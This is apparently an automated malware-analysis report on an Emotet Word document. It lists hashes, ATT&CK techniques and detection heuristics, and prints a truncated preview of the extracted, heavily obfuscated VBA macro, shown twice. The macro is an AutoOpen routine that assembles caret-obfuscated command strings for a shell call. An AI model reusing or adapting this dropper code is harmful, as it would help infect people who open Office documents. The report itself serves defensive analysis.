Emotet Office (OLE) malware analysis — malicious · cea8e605f7a5b7e6

MALICIOUS

Office (OLE)

208.6 KB Created: 2018-09-25 13:07:00 Authoring application: Microsoft Office Word First seen: 2019-11-20

MD5: c3d969dc45958d393ca4047b12f7b33a SHA-1: e2b6fe64b939b9439949096c74575f49811b7981 SHA-256: cea8e605f7a5b7e6eb435a0ba23acaa89d790a376ded5b140f518c6ff0b8d6d7

282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for Emotet. The macro utilizes a Shell() call, indicating an attempt to execute external code. The ClamAV signature 'Doc.Downloader.Emotet-6872603-0' directly attributes this file to the Emotet family, known for its downloader capabilities.

Heuristics 8

ClamAV: Doc.Downloader.Emotet-6872603-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6872603-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 231046 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	231046 bytes
SHA-256: `bed1f3df7ef18081bd8d980174c7f0dfd4a15d3735def70ba30db0ddfecbb353`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "jtTwjtRwjhdJFX" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim Glifh(2) Glifh(0) = MidB(qRzaB + FzBEhzRkCIiSpKmfXjZ + LbuZAiL, 286, 776) + MidB(JMjJU + McXChPnooWLEftGCrkq + qfdBSbdL, 608, 263) Glifh(1) = Left(HItiu + XsdijuqqRAlWmBmiUN + fqSJN, 713) + MidB(zWwTAN + GblbtibqivrsPshzrNl + ptDPa, 360, 556) Dim pXtck(1) pXtck(0) = Mid(Ocpjp + hiPHTQFVwjlAbMBwmDs + cQwdl, 913, 866) + MidB(OVlKLJ + GBvvwQYCpisjbKfCTczZ + SlGaFp, 833, 264) + Left(rCIdzXaY + XkmjFjHPWIfffSbHzr + izcCBDvB, 483) + MidB(siwZVFJk + pPMdwUzRGSsjdwiD + iIwmwj, 869, 126) Dim zaJtC(2) zaJtC(0) = MidB(IjCId + KsOdmAwtvfwkknFVjfjW + GCHTisp, 371, 990) + MidB(TqkiFEH + GRXVciHANbWjwqaoCqd + HoiUqbb, 536, 165) zaJtC(1) = Mid(ofmqwpi + cJXADjPTLXdhqNiQZmz + JsTEksMH, 206, 979) + Left(QdQKLzIw + GoYCsRszdwLNKtazPS + QXaRGNo, 821) Dim LvEzwI(1) LvEzwI(0) = Left(ElJflZ + aawHjzEwTNjNJPDQEdD + jYsifB, 718) + MidB(qbkBYv + GbivuGvVfhJHNdaKGZTU + RXhfBbHD, 259, 449) + Right(amRwJY + HLcEFzlFRnHcjNqEDZF + vNDosKQu, 967) + MidB(FudZdiWw + UUbJijSSiBRmIJsvBtI + XpkRa, 494, 59) krErjrCJirijBJ (KeyString(jdoiQ + iqCHM + 4 + 6 + 1 + 5 + 51 + tqqrG + dzGGPqB) + sPQLM + AMZbVd + KeyString(vUmDpCO + aCjib + 4 + 7 + 1 + 6 + 59 + BuiKswP + WpihCLA) + SzVQpkmXW + wFfzfEYzzPl + jwGGsdHEf + tInFCFq + lcvEusMMIRm + CtkoPMfZML + KIfKwTc + phCLcXrwIN + pVPSR + BhRiO + cljlDjLp + OWYLcLOkhfk + GCXVzCZh + DfPsnuJRu + mCRLLwfDqBR + ALiEi + DNSLiPX + bsbiK + ZfzooHUj) Dim ObpXSv(2) ObpXSv(0) = Right(vOJNCQdm + SGZBfZElGiTljLTtjTr + NDisz, 738) + Left(bDicZM + wNKZRdWhWEJtbPVobChE + MrhEDG, 979) ObpXSv(1) = MidB(iGhRmlaM + iaYDOHNYUAQIEjwSd + mDqiu, 947, 666) + MidB(qWbQv + SzpBaCpRWNiBdtjOVMfNQVUS + htIPudVo, 265, 585) + MidB(ZkXjAB + pNnGTcnkjFkfWQSGAYs + EGnupjVT, 901, 239) + Mid(FBvSql + YzjCUuiuXZwMpCsusKmpSR + CWnKnd, 357, 501) Dim iCuqL(1) iCuqL(0) = Right(mtwBts + TjjztiiUTcTTjkRFYED + qHsQcv, 620) + Right(uUbnhP + iqXiizDMRbnCqPQllRrH + uZOFcDCO, 553) + MidB(rhIIpE + EzVDFKWdEiqikZpGGOYYZ + ZjAdw, 240, 956) + MidB(qZVIuFi + ziiHoiAznPfjDlmXzIS + CCODj, 241, 19) End Sub Attribute VB_Name = "kauCoYXnIH" Function SzVQpkmXW() BaFuRSwh = "d " + CStr(Chr(4 + 0 + 7 + 6 + 30)) + "V^" + ":" + CStr(Chr(4 + 0 + 7 + 6 + 30)) + "C" + CStr(Chr(2 + 0 + 5 + 4 + 23)) + "^" + "s^" + "e^" + "t" + " ^" + CStr(Chr(8 + 1 + 15 + 13 + 55)) mRpzs = "^" + ".]" + ",=" + "^" + "5" + "1^" + "3" + " " jWVdapsTz = "9" + "^" + "5" + "0 " + "5" + "1" + "^" + "9" + " " + "^" + "9^" + "1" + "3" JmSmVROhljB = "^" + " " + "59" + "0^" + " " + "09" + "3 " + "^" iYunfiR = "9" + "50" + "^" + " " + "^" SzVQpkmXW = BaFuRSwh + mRpzs + jWVdapsTz + JmSmVROhljB + iYunfiR Dim zDShz(1) zDShz(0) = Right(XIIVSLqm + asjPjcbqjwwJrUUXH + GSTHPJ, 392) + Left(ZHHpDw + CpGIXzcLMaqWOOmOvbl + UOZVY, 144) + MidB(LDURnEiS + EwufwKscRjNoRVwaYEDG + StzUHDv, 414, 947) + Left(NoSPca + JwPDvpQZBaAqNAdQUOorrkz + rKvdZ, 356) Dim YTcjW(2) YTcjW(0) = MidB(JTRqriz + WVlEIQuLTsiKdXZziKzkb + uLWIirzR, 475, 884) + Left(fpnOE + wwqtuMFLnYkJkRVJoAhtEdc + KvwtizVs, 85) + MidB(wZtlizJ + NTEZuRRFmQSpLrfGLPY + NNPHvO, 88, 394) + Mid(jqrWwNUD + AIGNGVTCwIoCmLVWqhv + fwZUhsrL, 722, 978) YTcjW(1) = Mid(HBAab + UrroEKLwhwkEiKvSmK + DDVGZAVv, 287, 942) + Mid(wnIVJQh + oOLwqTqIwHNuokrLdlh + cRuBaIW, 552, 278) + Left(pKJjji + wXSEzmFYWPslTZZoEz + wcZvYuI, 592) + Right(boDKNv + DzGzZHOYKHqMGWsTbNKQrQ + mhJLdKP, 932) Dim DqBfrd(2) DqBfrd(0) = MidB(Xjjzno + wJZVGYTDPihGwbXZatzdl + UDSmMC, 234, 274) + MidB(tBafWE + uVNaFIJOYnzjoDPdRDjV + MiotuD, 784, 403) + Right(PKtwKcsn + hiERrbHLYOAVLtaUVwif + YKQToK, 869) + Mid(hdaWBT + JccPohjHSSSDGwTQ + XOUSE, 572, 296) DqBfrd(1) = MidB(ZBZkVCWF + LmjraPpaTahCEGHwkEqd + RtriAkqk, 777, 610) + Right(WuDPzojY + UijnOJzYJXwIVwjjzNZl + MsVEBtlC, 355) End Function Function wFfzfEYzzPl() DiaZCswVSSJ = "1" + "0" + "^" + "3" + "^ " ... (truncated)

SHA-256: bed1f3df7ef18081bd8d980174c7f0dfd4a15d3735def70ba30db0ddfecbb353

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "jtTwjtRwjhdJFX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim Glifh(2)
Glifh(0) = MidB(qRzaB + FzBEhzRkCIiSpKmfXjZ + LbuZAiL, 286, 776) + MidB(JMjJU + McXChPnooWLEftGCrkq + qfdBSbdL, 608, 263)
Glifh(1) = Left(HItiu + XsdijuqqRAlWmBmiUN + fqSJN, 713) + MidB(zWwTAN + GblbtibqivrsPshzrNl + ptDPa, 360, 556)
   Dim pXtck(1)
pXtck(0) = Mid(Ocpjp + hiPHTQFVwjlAbMBwmDs + cQwdl, 913, 866) + MidB(OVlKLJ + GBvvwQYCpisjbKfCTczZ + SlGaFp, 833, 264) + Left(rCIdzXaY + XkmjFjHPWIfffSbHzr + izcCBDvB, 483) + MidB(siwZVFJk + pPMdwUzRGSsjdwiD + iIwmwj, 869, 126)
   Dim zaJtC(2)
zaJtC(0) = MidB(IjCId + KsOdmAwtvfwkknFVjfjW + GCHTisp, 371, 990) + MidB(TqkiFEH + GRXVciHANbWjwqaoCqd + HoiUqbb, 536, 165)
zaJtC(1) = Mid(ofmqwpi + cJXADjPTLXdhqNiQZmz + JsTEksMH, 206, 979) + Left(QdQKLzIw + GoYCsRszdwLNKtazPS + QXaRGNo, 821)
   Dim LvEzwI(1)
LvEzwI(0) = Left(ElJflZ + aawHjzEwTNjNJPDQEdD + jYsifB, 718) + MidB(qbkBYv + GbivuGvVfhJHNdaKGZTU + RXhfBbHD, 259, 449) + Right(amRwJY + HLcEFzlFRnHcjNqEDZF + vNDosKQu, 967) + MidB(FudZdiWw + UUbJijSSiBRmIJsvBtI + XpkRa, 494, 59)
krErjrCJirijBJ (KeyString(jdoiQ + iqCHM + 4 + 6 + 1 + 5 + 51 + tqqrG + dzGGPqB) + sPQLM + AMZbVd + KeyString(vUmDpCO + aCjib + 4 + 7 + 1 + 6 + 59 + BuiKswP + WpihCLA) + SzVQpkmXW + wFfzfEYzzPl + jwGGsdHEf + tInFCFq + lcvEusMMIRm + CtkoPMfZML + KIfKwTc + phCLcXrwIN + pVPSR + BhRiO + cljlDjLp + OWYLcLOkhfk + GCXVzCZh + DfPsnuJRu + mCRLLwfDqBR + ALiEi + DNSLiPX + bsbiK + ZfzooHUj)
   Dim ObpXSv(2)
ObpXSv(0) = Right(vOJNCQdm + SGZBfZElGiTljLTtjTr + NDisz, 738) + Left(bDicZM + wNKZRdWhWEJtbPVobChE + MrhEDG, 979)
ObpXSv(1) = MidB(iGhRmlaM + iaYDOHNYUAQIEjwSd + mDqiu, 947, 666) + MidB(qWbQv + SzpBaCpRWNiBdtjOVMfNQVUS + htIPudVo, 265, 585) + MidB(ZkXjAB + pNnGTcnkjFkfWQSGAYs + EGnupjVT, 901, 239) + Mid(FBvSql + YzjCUuiuXZwMpCsusKmpSR + CWnKnd, 357, 501)
   Dim iCuqL(1)
iCuqL(0) = Right(mtwBts + TjjztiiUTcTTjkRFYED + qHsQcv, 620) + Right(uUbnhP + iqXiizDMRbnCqPQllRrH + uZOFcDCO, 553) + MidB(rhIIpE + EzVDFKWdEiqikZpGGOYYZ + ZjAdw, 240, 956) + MidB(qZVIuFi + ziiHoiAznPfjDlmXzIS + CCODj, 241, 19)
End Sub


Attribute VB_Name = "kauCoYXnIH"
Function SzVQpkmXW()
BaFuRSwh = "d " + CStr(Chr(4 + 0 + 7 + 6 + 30)) + "V^" + ":" + CStr(Chr(4 + 0 + 7 + 6 + 30)) + "C" + CStr(Chr(2 + 0 + 5 + 4 + 23)) + "^" + "s^" + "e^" + "t" + " ^" + CStr(Chr(8 + 1 + 15 + 13 + 55))
mRpzs = "^" + ".]" + ",=" + "^" + "5" + "1^" + "3" + " "
jWVdapsTz = "9" + "^" + "5" + "0 " + "5" + "1" + "^" + "9" + " " + "^" + "9^" + "1" + "3"
JmSmVROhljB = "^" + " " + "59" + "0^" + " " + "09" + "3 " + "^"
iYunfiR = "9" + "50" + "^" + " " + "^"
SzVQpkmXW = BaFuRSwh + mRpzs + jWVdapsTz + JmSmVROhljB + iYunfiR
   Dim zDShz(1)
zDShz(0) = Right(XIIVSLqm + asjPjcbqjwwJrUUXH + GSTHPJ, 392) + Left(ZHHpDw + CpGIXzcLMaqWOOmOvbl + UOZVY, 144) + MidB(LDURnEiS + EwufwKscRjNoRVwaYEDG + StzUHDv, 414, 947) + Left(NoSPca + JwPDvpQZBaAqNAdQUOorrkz + rKvdZ, 356)
   Dim YTcjW(2)
YTcjW(0) = MidB(JTRqriz + WVlEIQuLTsiKdXZziKzkb + uLWIirzR, 475, 884) + Left(fpnOE + wwqtuMFLnYkJkRVJoAhtEdc + KvwtizVs, 85) + MidB(wZtlizJ + NTEZuRRFmQSpLrfGLPY + NNPHvO, 88, 394) + Mid(jqrWwNUD + AIGNGVTCwIoCmLVWqhv + fwZUhsrL, 722, 978)
YTcjW(1) = Mid(HBAab + UrroEKLwhwkEiKvSmK + DDVGZAVv, 287, 942) + Mid(wnIVJQh + oOLwqTqIwHNuokrLdlh + cRuBaIW, 552, 278) + Left(pKJjji + wXSEzmFYWPslTZZoEz + wcZvYuI, 592) + Right(boDKNv + DzGzZHOYKHqMGWsTbNKQrQ + mhJLdKP, 932)
   Dim DqBfrd(2)
DqBfrd(0) = MidB(Xjjzno + wJZVGYTDPihGwbXZatzdl + UDSmMC, 234, 274) + MidB(tBafWE + uVNaFIJOYnzjoDPdRDjV + MiotuD, 784, 403) + Right(PKtwKcsn + hiERrbHLYOAVLtaUVwif + YKQToK, 869) + Mid(hdaWBT + JccPohjHSSSDGwTQ + XOUSE, 572, 296)
DqBfrd(1) = MidB(ZBZkVCWF + LmjraPpaTahCEGHwkEqd + RtriAkqk, 777, 610) + Right(WuDPzojY + UijnOJzYJXwIVwjjzNZl + MsVEBtlC, 355)
End Function
Function wFfzfEYzzPl()
DiaZCswVSSJ = "1" + "0" + "^" + "3" + "^ "
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.